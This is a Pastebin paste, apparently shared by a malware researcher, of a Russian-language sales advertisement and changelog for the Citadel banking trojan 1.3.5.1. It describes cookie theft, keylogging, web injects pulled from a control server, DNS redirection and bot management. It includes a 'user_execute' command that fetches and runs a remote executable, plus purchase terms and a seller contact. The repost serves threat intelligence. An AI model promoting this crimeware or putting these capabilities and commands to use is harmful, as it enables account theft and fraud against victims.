Kafeine

Update to Citadel : 1.3.5.1 Rain Edition - Original Adv

Oct 3rd, 2012
1,129
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Самые современные средства и инструменты для профессиональной работы собраны специально для вас в новой версии.
  2. Решены проблемы с отстуком и живучестью, работа стала еще приятнее, учтены самые важные пожелания.
  3. Взят во внимание весь опыт работы за последний сезон, новичкам будет гораздо проще работать с новой версией, чем с предыдущими.
  4. Теперь открыта в свободном доступе новая технология WebInjects для всех желающих.
  5.  
  6. [+] Сделана быстрая проверка ботов на Online-статус, списком на главной странцие.
  7. [+] Возможность добавить бота в "Избранное" без отчетов.
  8. [+] Сделано детектирование привилегий в системе(admin/user), отображается в "Информация о боте: [Флаги]"
  9. [+] Сортировка скриншотов по дате.
  10. [+] Добавлена возможность подключения других БД Citadel (как удаленные БД, так и старые/отключенные админки) для поиска отчетов.
  11. [+] Расширен поиск в БД: можно указывать стоп-слова, например twitter.com, которые будут отсутствовать при выдаче результатов, чтобы не засорять логи мусором. Также, можно указать поиск не по содержимому отчета, а по URL Mask, это увеличивает скорость поиска данных.
  12. [+] Расширен Jabber уведомитель, добавлены следущие события:
  13. - Маски BotID на событие "Бот вышел в Online"
  14. - Уведомление при обнаружении конкретного ПО из "installed software"
  15. - Маска на содержимое CMD отчета.
  16. - Параллельная удобная запись в log-файл всех событий, помимо Jabber-уведомлений.
  17. [+] Добавлен бесплатный модуль граббинга кукисов в Firefox, экспортирует все cookies из браузера и отсылает вам.
  18. [+] Исправлена ошибка удаления отчетов.
  19. [+] Авто-обновление статистики главной страницы.
  20. [+] Кнопка [Decode] на отчетах, которая позволяет декодировать urlencode(%0D) последовательности в удобный вид.
  21. [+] Добавлена возможность определения online/offline статуса у бота в API.
  22. [+] Полностью переделан алгоритм проверки в модуле WebSocks.
  23. [+] Отображение скриптов(команд) постранично.
  24. [+] Добавлена возможность отсылки сообщений на jabber через api.php (использует ваши персональные настройки в админке)
  25. [+] Теперь при каждом HTTP/HTTPS отчете, добавляются cookies(Firefox/IE), а также заголовки:
  26. [+] Полностью переделан внутренний алгоритм шифрования, отстук во много раз выше, живучесть дольше. Для переноса ботов на новую версию, выполняем команду user_execute http://www.host.com/1351.exe. RC4 ключ должен совпадать.
  27. [+] Корректировка Browser Keylogger'a. Автоматически добавляются пробел, если с момента последнего нажатия клавиши прошло 5 секунд, необходимо для визуального разделения input-полей.
  28. [+] Исправлен недочет с 302 редиректом, когда не срабатывал инжект, если осуществлялся переход по ссылке через javascript.
  29. [+] Plaintext логи открываются в новой вкладке.
  30. [+] Исправлена ошибка пропадания ботов из онлайна при включенном GeoIP.
  31. [+] Отображение комментария к боту в VNC-модуле при наведении мышки, а также отсылка комментария в jabber вместе с информацией о коннекте.
  32. [+] Возможность указать в DnsFilters(перенаправление траффика) маски со звездочками (*), можно сделать маску более гибкой.
  33. [+] WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Модуль работает через админку.
  34. Краткий ликбез:
  35. В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
  36. В разделе ВебИнжекты существуют 2 секции: "Группа вебинжектов" и "Паки", первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
  37. В главном меню, вразделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только своя группа списка инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельно взятой категории ботов по классу: страна или ботнет.
  38. В админке создан специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
  39. Сушествует несколько режимов для паков.
  40. Dual - когда работает файл с инжектами из основного конфига + вебинжекты.
  41. Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
  42. Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
  43. Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
  44. В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также, можно поискать DEBUG-отчеты по боту и посмотреть историю компиляций и ошибок вебинжектов.
  45. Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
  46. Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя.
  47. [+] Опция в конфиге disable_httpgrabber расширена и позволяет полностью избавиться от HTTP-отчетов, отправляя на сервер только HTTPS-отчеты со всех браузеров, если установлено значение "1". Избавьтесь от лишней нагрузки на сервер.
  48. [+] Добавлена секция "HttpVipUrls" в WebFilters, которая позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1).
  49. [+] Полностью перереботан мануал, теперь удобная навигация + раскрыты некоторые тонкости работы, а также добавлены ответы на популярные вопросы, с примерами. Изменено лицензионное соглашение, которое содержится в мануале.
  50.  
  51. Для получения новой версии, размещаем заявку в Jabber'e в таком формате: "<login в CRM> размещаю заявку на получение новой версии". Оплата поддержки должна быть своевременной, те, у кого задолжность более 3 месяцев - новую версию не получают. Срок выдачи от 3 до 72 часов. Если у вас имеется лицензированный партнер или саппорт, сразу пишите об этом в заявке до выдачи, а не после.
  52.  
  53. Для старых клиентов, обновление включено в абонентскую плату, для новых, цена базовой комплектации составляет теперь $3931.00
  54.  
  55. Jabber для покупки и обновлений: aquabox@lugmen.org.ar
  56. Саппорт в праве отказать в продаже лицензии без объяснения причины. Поддержка клиентов на уровне сложных технических вопросов отменена из-за большого количества, обменивайтесь опытом с коллегами через CRM либо форумы.
RAW Paste Data